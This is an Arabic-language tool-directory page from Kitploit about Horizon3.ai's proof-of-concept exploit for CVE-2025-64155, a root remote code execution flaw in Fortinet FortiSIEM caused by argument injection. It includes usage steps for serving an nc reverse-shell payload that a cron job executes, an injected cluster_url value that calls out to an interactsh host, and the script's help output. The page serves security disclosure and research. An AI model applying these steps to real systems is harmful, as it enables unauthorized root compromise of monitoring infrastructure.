Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-64155 — CVE-2025-64155: Fortinet FortiSIEM حقن الوسائط المؤدي إلى تنفيذ التعليمات البرمجية عن بُعد | Kitploit
أدوات/GitHubGitHub/horizon3ai/cve-2025-64155
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubhorizon3ai/cve-2025-64155

CVE-2025-64155

CVE-2025-64155: Fortinet FortiSIEM حقن الوسائط المؤدي إلى تنفيذ التعليمات البرمجية عن بُعد

عرض المستودع
3321منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-64155: حقن الوسائط في Fortinet FortiSIEM لتنفيذ التعليمات البرمجية عن بُعد

استغلال إثبات المفهوم (Proof of Concept) لـ Fortinet FortiSIEM يستغل حقن الوسائط (argument injection) لكتابة ملف بهدف الحصول على تنفيذ تعليمات برمجية بصلاحيات الجذر (root)

منشور المدونة

التحليل المتعمق هنا: Horizon3.ai - CVE-2025-64155: ثلاث سنوات من الحصول على صلاحيات الجذر عن بُعد في Fortinet FortiSIEM

ملاحظة

من المرجح أن يؤدي استغلال هذه الثغرة لاستبدال ملفات التطبيق إلى عدم استقرار النظام. استخدم بحذر. يمكن تشغيل الفحوصات بشكل غير ضار عن طريق تعديل cluster_url لتصبح: <cluster_url>http://127.0.0.1:80 --next http://<INTERACTSH_URL></cluster_url>

الاستخدام

  1. عدّل الحمولة (payload) في خادم الويب serve.py إلى الحمولة المطلوبة (مثل: nc reverse shell)
  2. عدّل cluster_url في CVE-2025-64155.py ليشير إلى عنوان URL الأساسي للخادم الذي يعمل عليه serve.py (مثل: http://10.0.40.83:9200)
  3. شغّل خادم الويب serve.py
  4. شغّل الاستغلال CVE-2025-64155.py
  5. انتظر حوالي دقيقة واحدة حتى تنفذ مهمة cron الحمولة
% python3 CVE-2025-64155.py -h
usage: CVE-2025-64155.py [-h] -t TARGET [-p PORT]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        The IP address of the target
  -p PORT, --port PORT  The port of the Phoenix Monitor service

تابع Horizon3.ai Attack Team على تويتر لأحدث أبحاث الأمن:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

إخلاء مسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في الحالات المصرَّح بها صراحةً. القائمون على المشروع غير مسؤولين عن سوء استخدام هذا البرنامج. استخدمه بمسؤولية.

تنزيل الأداة